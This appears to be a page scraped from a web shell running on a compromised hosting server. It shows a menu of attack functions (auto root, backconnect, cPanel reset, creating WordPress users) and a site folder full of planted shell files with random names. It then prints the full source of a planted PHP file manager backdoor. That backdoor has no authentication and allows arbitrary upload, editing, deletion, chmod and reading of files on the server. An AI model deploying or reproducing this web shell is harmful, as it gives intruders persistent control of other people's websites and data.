Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
wwnova /
public_html /
tudosorte.com.br /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
.buy.php
579
B
-rw-r--r--
.documentroot.php
280
B
-rw-r--r--
.goods.php
577
B
-rw-r--r--
.wp-esp.php
577
B
-rw-r--r--
0x194945BXRH.php
4.12
KB
-rw-r--r--
0x19495GZCOU.php
4.12
KB
-rw-r--r--
0x1949BIJKKG.php
4.12
KB
-rw-r--r--
0x1949LKGFCR.php
4.12
KB
-rw-r--r--
0x1949Q4FPN1.php
4.12
KB
-rw-r--r--
0x1949RNWM66.php
4.12
KB
-rw-r--r--
Private-MASS-ova.php
19.06
KB
-rw-r--r--
admin.php
209
B
-rw-r--r--
bero.pHtML
44.85
KB
-rw-r--r--
berofc.php
44.85
KB
-rw-r--r--
bw.php
9.51
KB
-rw-r--r--
dataat.pHtML
16
KB
-rw-r--r--
default.xml
402
B
-rw-r--r--
documentroot.php
280
B
-rw-r--r--
error_log
27.57
KB
-rw-r--r--
error_log.pHtML
28.62
KB
-rw-r--r--
error_log.php
28.62
KB
-rw-r--r--
finalkitaya.PHP
6.86
KB
-rw-r--r--
googlef7118cfda07b48b4.html
53
B
-rw-r--r--
index.php
381.47
KB
-rw-r--r--
logssss.pHtML
3.12
KB
-rw-r--r--
modric8BTCHM.php
70.77
KB
-rw-r--r--
modricDHXFVX.php
2.14
KB
-rw-r--r--
modricPNBH8L.php
70.77
KB
-rw-r--r--
modricZW9ITU.php
2.14
KB
-rw-r--r--
perantaraupload.php
6.02
KB
-rw-r--r--
php.ini
40
B
-rw-r--r--
postnews.php
5.72
KB
-r--r--r--
tes110000.pHtML
5.63
KB
-rw-r--r--
uploa.pHtML
6.02
KB
-rw-r--r--
wp-est.php
575
B
-rw-r--r--
wp-ompira.php
577
B
-rw-r--r--
x7.php
278
B
-rw-r--r--
没啥.php
13.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : finalkitaya.PHP
<?php // --- Anti Error & Log --- error_reporting(E_ALL); ini_set('display_errors', 0); ini_set('log_errors', 1); ini_set('error_log', __DIR__.'/error.log'); // --- Direktori saat ini --- $directory = isset($_GET['dir']) ? $_GET['dir'] : __DIR__; $directory = realpath($directory); if (!is_dir($directory)) die("Direktori tidak valid."); // --- Tombol naik folder --- $parentDir = dirname($directory); // --- Scan folder --- $files = array_diff(scandir($directory), array('.', '..')); $dirs = $regularFiles = []; foreach ($files as $file) { $filePath = $directory . DIRECTORY_SEPARATOR . $file; if (is_dir($filePath)) $dirs[] = $file; else $regularFiles[] = $file; } $sortedFiles = array_merge($dirs, $regularFiles); // --- Pesan status --- $msg = ''; // --- Handle Upload File --- if (isset($_FILES['upload_file'])) { $targetFile = $directory . DIRECTORY_SEPARATOR . basename($_FILES['upload_file']['name']); if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $targetFile)) $msg = "Upload sukses!"; else $msg = "Upload gagal!"; } // --- Handle Create Folder --- if (isset($_POST['new_folder'])) { $newFolder = $directory . DIRECTORY_SEPARATOR . $_POST['new_folder']; if (!file_exists($newFolder) && mkdir($newFolder)) $msg = "Folder dibuat: ".$_POST['new_folder']; else $msg = "Gagal buat folder!"; } // --- Handle Create File --- if (isset($_POST['new_file'])) { $newFile = $directory . DIRECTORY_SEPARATOR . $_POST['new_file']; if (!file_exists($newFile) && file_put_contents($newFile, '') !== false) $msg = "File dibuat: ".$_POST['new_file']; else $msg = "Gagal buat file!"; } // --- Handle Delete --- if (isset($_POST['delete_file'])) { $target = $directory . DIRECTORY_SEPARATOR . $_POST['delete_file']; if (is_file($target) && unlink($target)) $msg = "File dihapus: ".$_POST['delete_file']; elseif (is_dir($target) && rmdir($target)) $msg = "Folder dihapus: ".$_POST['delete_file']; else $msg = "Gagal menghapus: ".$_POST['delete_file']; } // --- Handle Rename --- if (isset($_POST['rename_file'], $_POST['new_name'])) { $old = $directory . DIRECTORY_SEPARATOR . $_POST['rename_file']; $new = $directory . DIRECTORY_SEPARATOR . $_POST['new_name']; if (rename($old, $new)) $msg = "Rename sukses!"; else $msg = "Rename gagal!"; } // --- Handle Edit File --- if (isset($_POST['edit_file'], $_POST['edit_content'])) { $fileEdit = $directory . DIRECTORY_SEPARATOR . $_POST['edit_file']; if (is_writable($fileEdit) && file_put_contents($fileEdit, $_POST['edit_content']) !== false) $msg = "Edit sukses!"; else $msg = "Edit gagal!"; } // --- Handle Chmod --- if (isset($_POST['chmod_file'], $_POST['chmod_value'])) { $chmodPath = $directory . DIRECTORY_SEPARATOR . $_POST['chmod_file']; $chmodVal = octdec($_POST['chmod_value']); if (chmod($chmodPath, $chmodVal)) $msg = "Chmod sukses!"; else $msg = "Chmod gagal!"; } $currentDir = htmlspecialchars($directory); ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>PHP File Manager Full</title> <style> body{font-family:arial;background:#f2f2f2;margin:0;padding:0;} header{background:#333;color:#fff;padding:10px;} .container{padding:15px;} .file-list{list-style:none;padding:0;} .file-item{margin:5px 0;display:flex;align-items:center;} .file-item .icon{width:40px;text-align:center;} .file-item .file-name{margin-left:5px;} .message{padding:5px;color:green;} input, button, textarea{padding:5px;margin:3px;} textarea{width:100%;height:200px;} form.inline{display:inline;} </style> </head> <body> <header> <h2>PHP File Manager Full</h2> <small>Current Dir: <?php echo $currentDir; ?></small> </header> <div class="container"> <?php if($msg) echo "<p class='message'>".$msg."</p>"; ?> <!-- Upload --> <form method="post" enctype="multipart/form-data"> <input type="file" name="upload_file"> <button type="submit">Upload File</button> </form> <!-- Create File & Folder --> <form method="post" class="inline"> <input type="text" name="new_file" placeholder="Nama file baru"> <button type="submit">Buat File</button> </form> <form method="post" class="inline"> <input type="text" name="new_folder" placeholder="Nama folder baru"> <button type="submit">Buat Folder</button> </form> <!-- File List --> <ul class="file-list"> <?php if ($parentDir && is_dir($parentDir)): ?> <li class="file-item"> <a href="?dir=<?php echo urlencode($parentDir); ?>" class="icon">[Parent]</a> <span class="file-name">..</span> </li> <?php endif; ?> <?php foreach ($sortedFiles as $file): $filePath = $directory . DIRECTORY_SEPARATOR . $file; ?> <li class="file-item"> <div class="icon"><?php echo is_dir($filePath) ? "[Dir]" : "[File]"; ?></div> <div class="file-name"> <?php if(is_dir($filePath)): ?> <a href="?dir=<?php echo urlencode($filePath); ?>"><?php echo htmlspecialchars($file); ?></a> <?php else: ?> <?php echo htmlspecialchars($file); ?> <?php endif; ?> </div> <!-- Action Buttons --> <form method="post" class="inline"> <input type="hidden" name="delete_file" value="<?php echo htmlspecialchars($file); ?>"> <button type="submit">Delete</button> </form> <form method="post" class="inline"> <input type="hidden" name="rename_file" value="<?php echo htmlspecialchars($file); ?>"> <input type="text" name="new_name" placeholder="Rename"> <button type="submit">Rename</button> </form> <?php if(!is_dir($filePath)): ?> <form method="post" class="inline"> <input type="hidden" name="edit_file" value="<?php echo htmlspecialchars($file); ?>"> <button type="button" onclick="editFile('<?php echo addslashes($file); ?>')">Edit</button> </form> <?php endif; ?> </li> <?php endforeach; ?> </ul> <!-- Edit Modal --> <div id="editModal" style="display:none;"> <form method="post" id="editForm"> <h3>Edit File: <span id="editFileName"></span></h3> <textarea name="edit_content" id="editContent"></textarea> <input type="hidden" name="edit_file" id="editFileInput"> <button type="submit">Save</button> <button type="button" onclick="closeEdit()">Cancel</button> </form> </div> <script> function editFile(filename){ document.getElementById('editModal').style.display='block'; document.getElementById('editFileName').innerText = filename; document.getElementById('editFileInput').value = filename; fetch('?dir=<?php echo urlencode($directory); ?>&file_view='+filename) .then(r=>r.text()) .then(data=>document.getElementById('editContent').value=data); } function closeEdit(){ document.getElementById('editModal').style.display='none'; } </script> </div> </body> </html> <?php // --- Handle file_view for edit modal --- if(isset($_GET['file_view'])){ $file = $directory . DIRECTORY_SEPARATOR . $_GET['file_view']; if(is_file($file)) die(file_get_contents($file)); else die('File tidak ditemukan.'); } ?>
Close